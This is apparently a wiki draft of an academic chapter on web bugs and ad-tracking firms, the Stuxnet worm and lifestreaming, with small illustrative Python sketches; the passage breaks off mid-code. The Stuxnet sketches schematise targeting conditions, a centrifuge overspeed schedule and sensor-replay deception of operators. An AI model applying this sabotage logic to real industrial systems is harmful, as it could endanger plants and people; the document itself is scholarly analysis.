*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid attracting too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the do-not-track header, and there is currently no legal requirement that they do so in the US or elsewhere (W3C, 2012). See, though, the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?] &lt;br /&gt;
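&lt;br /&gt;
A minimal sketch, assuming a request's headers arrive as a simple Python dictionary standing in for a real web framework's request object, of what respecting the 'do not track' flag (sent as the HTTP header DNT: 1) would amount to: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# Respect the opt-out only if the DNT flag is present and set to '1'. &lt;br /&gt;
def should_track(request_headers): &lt;br /&gt;
    return request_headers.get('DNT') != '1' &lt;br /&gt;
&lt;br /&gt;
print(should_track({'DNT': '1'}))   # False: the user has opted out &lt;br /&gt;
print(should_track({}))             # True: no preference expressed &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;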
&lt;br /&gt;
One of the newer web bugs under development, and one perhaps indicative of the direction of travel, is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service that claims 'an eye on 1091622 websites', and which shows that this new code ecology is not a purely Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in the use of these tracker technologies. Pew (2012) found, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would &amp;quot;not be okay&amp;quot; with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be &amp;quot;okay&amp;quot; with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction, between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices, and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This is an issue helpfully illustrated by the next case study, of the Stuxnet virus, which shows how far the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and then activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. Its name, ‘Stuxnet’, is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) file, mrxcls.sys; and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, such as a test facility to model a nuclear plant, to create and launch (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
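&lt;br /&gt;
O Murchu's description can be rendered schematically. The Python sketch below caricatures the ‘strike conditions’ logic described above: propagate until a host matches the target profile, then activate the payload. All names and fields here are illustrative assumptions; none are drawn from the actual Stuxnet code. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Schematic sketch of 'strike conditions': propagate until a host
# matches the target profile, then activate the payload. Illustrative
# only; not reconstructed from the actual Stuxnet code.
TARGET_PROFILE = {
    'plc_model': 'S7-300',                   # the Siemens controller named by Symantec
    'converters': {'Fararo Paya', 'Vacon'},  # converter makers named in Zetter (2011)
}

def strike_conditions_met(host):
    right_plc = host.get('plc_model') == TARGET_PROFILE['plc_model']
    found = TARGET_PROFILE['converters'].intersection(host.get('converters', []))
    return right_plc and bool(found)

def activate_payload(host):                  # stand-in for the 'digital warhead'
    print('payload activated on', host['name'])

def propagate(host, neighbours):
    if strike_conditions_met(host):
        activate_payload(host)
    return neighbours                        # stand-in for copying itself onward

propagate({'name': 'natanz-plc', 'plc_model': 'S7-300',
           'converters': ['Vacon']}, neighbours=[])
&amp;lt;/pre&amp;gt; &lt;br /&gt;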
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection, covering its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behavior and therefore raise an alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the act of sabotage, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
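&lt;br /&gt;
Zetter's account can be read as a simple attack schedule. The sketch below encodes the frequencies and timings from the quotation; the structure and names are an illustrative reconstruction, not the worm's actual logic. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# The attack sequence Zetter describes, rendered as a simple schedule.
# Frequencies and timings follow the quotation above; everything else
# is an illustrative reconstruction.
NOMINAL_HZ = 1064

attack_schedule = [
    ('raise', 1410, 'held briefly, returned to nominal within 15 minutes'),
    ('wait', 27, 'days of apparently normal operation'),
    ('drop', 2, 'held for 50 minutes, then restored to nominal'),
    ('wait', 27, 'days of apparently normal operation'),
    # ...and the cycle repeats
]

for action, value, note in attack_schedule:
    if action == 'wait':
        print(f'wait {value} days: {note}')
    else:
        print(f'set frequency to {value} Hz ({note}), then back to {NOMINAL_HZ} Hz')
&amp;lt;/pre&amp;gt; &lt;br /&gt;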
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable the warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general-purpose attack, but one designed to unload its digital warheads under specific conditions against a specific target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
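&lt;br /&gt;
The deception practised on the operators can be caricatured as a record-and-replay loop: capture normal sensor values, then feed them back to the operators' display while the attack runs, so that the interface no longer reflects the physical process. The following Python sketch is purely illustrative and is not reconstructed from Stuxnet itself. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Record-and-replay deception, caricatured: record real sensor values
# during normal operation, then replay them while the attack runs.
import itertools

recorded = []                      # readings captured before the attack

def observe(sensor_value, attacking, replay):
    if not attacking:
        recorded.append(sensor_value)
        return sensor_value        # operators see the real value
    return next(replay)            # operators see stale, normal-looking data

# capture ten normal readings, then replay them in a loop during the attack
for v in [1064.0] * 10:
    observe(v, attacking=False, replay=None)
replay = itertools.cycle(recorded)
print(observe(1410.0, attacking=True, replay=replay))   # prints 1064.0
&amp;lt;/pre&amp;gt; &lt;br /&gt;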
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, given the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexity and structure of the worm mean that at least thirty people would have had to work on it simultaneously (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known to the developer of the attacked system, in this case Microsoft and Siemens. In fact, Stuxnet was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) systems and PLCs (Programmable Logic Controllers), this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, the ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (the ‘man-in-the-middle attack’ described above). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller (315) was designed slowly to reduce the speed of the rotors, leading to cracks and failures, while the larger (417) manipulated valves in the centrifuges, faking industrial process control sensor signals by modelling the centrifuges, which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of Stuxnet has been hypothesized from an analysis of its approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic: taking the machine code, disassembling it, and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011); a toy illustration of this kind of artefact hunting is sketched below Table 1. Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel must have been involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see Table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
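&lt;br /&gt;
Returning to the method of analysis described above: a toy version of the artefact hunting involved is a scan of a binary image for runs of printable characters, the kind of step that surfaces tell-tale fragments such as the 'myrtus' project path quoted in note [9]. The real analysis involved full disassembly to C; this Python sketch is far simpler and purely illustrative. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Toy artefact hunting: scan a binary blob for runs of printable ASCII,
# as the Unix 'strings' tool does. The sample embeds the 'myrtus' path
# quoted in note [9]; everything else is invented padding.
import re

def printable_strings(blob, min_len=6):
    # runs of at least min_len printable ASCII bytes
    return re.findall(rb'[\x20-\x7e]{%d,}' % min_len, blob)

sample = b'\x00\x01b:\\myrtus\\src\\objfre_w2k_x86\\i386\\guava.pdb\x00\xff'
for s in printable_strings(sample):
    print(s.decode('ascii'))
&amp;lt;/pre&amp;gt; &lt;br /&gt;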
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild, it is relatively trivial to decode it and to learn, in a very short time, techniques that would otherwise have taken many years to develop. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one with purposes linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increasing ability of code and software, via computational devices, covertly to monitor, control and mediate, both positively and negatively, is not just a matter of interventions designed to deceive the human and non-human actors that make up these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams and, more particularly, the quantified-self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies known as lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years alongside ‘real-time stream’ platforms such as Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea developed by David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), who described them as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’, exemplified by the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter with its short, text-message-sized 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect his own data systematically, starting in 1989. As he explains: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
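&lt;br /&gt;
Freeman's description translates readily into a simple data structure. The Python sketch below models a lifestream as a time-ordered list of documents with two of the operators he mentions (storing, and filtering into substreams); all names and the sample documents are illustrative. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Minimal sketch of a lifestream: a time-ordered stream of documents
# with 'store' and 'filter' operators, after Freeman's description.
import bisect, time

class Lifestream:
    def __init__(self):
        self._docs = []                              # kept sorted by timestamp

    def store(self, content, timestamp=None):
        ts = time.time() if timestamp is None else timestamp
        bisect.insort(self._docs, (ts, content))     # 'transparently store information'

    def substream(self, predicate):
        # the 'filter' operator: a view containing only matching documents
        return [(ts, d) for ts, d in self._docs if predicate(d)]

    def future(self, now=None):
        # reminders and to-dos live 'beyond the present' in the stream
        now = time.time() if now is None else now
        idx = bisect.bisect_right(self._docs, (now, chr(0)))
        return self._docs[idx:]

stream = Lifestream()
stream.store('electronic birth certificate', timestamp=0.0)
stream.store('reminder: dentist', timestamp=time.time() + 86400)
print(stream.future())                               # the dentist reminder
&amp;lt;/pre&amp;gt; &lt;br /&gt;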
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and, in the context of reflexivity and self-knowledge, it raises interesting questions. The data collected can also be relatively large in scale and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that are common in smartphones, to log GPS location, direction, etc. This is where life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users who are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
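&lt;br /&gt;
The ‘Geraldine posted a photo to her album’ example can be encoded roughly in the JSON Activity Streams 1.0 vocabulary cited above (actor/verb/object/target). The field values in the Python sketch below are invented for illustration and should not be read as a normative example from the specification. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# 'Geraldine posted a photo to her album', sketched roughly in the
# JSON Activity Streams 1.0 vocabulary; values are invented.
import json

activity = {
    'published': '2012-03-04T12:00:00Z',
    'actor': {'objectType': 'person', 'displayName': 'Geraldine'},
    'verb': 'post',
    'object': {'objectType': 'photo',
               'url': 'http://example.org/photos/1'},
    'target': {'objectType': 'photo-album',
               'displayName': 'Holiday Snaps'},
}
print(json.dumps(activity, indent=2))
&amp;lt;/pre&amp;gt; &lt;br /&gt;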
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case, in other words for the individual user (or lifestreamer) and the organization (such as Facebook), the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or a population, group, or class of others.[13] &lt;br /&gt;
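&lt;br /&gt;
One simple version of this pattern-matching step is to compare new data points against a personal historical baseline, flagging deviations beyond some threshold. The Python sketch below assumes invented sleep data and an arbitrary threshold; it stands in for the far more elaborate statistics real platforms run. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Compare new data points against a personal baseline (mean and
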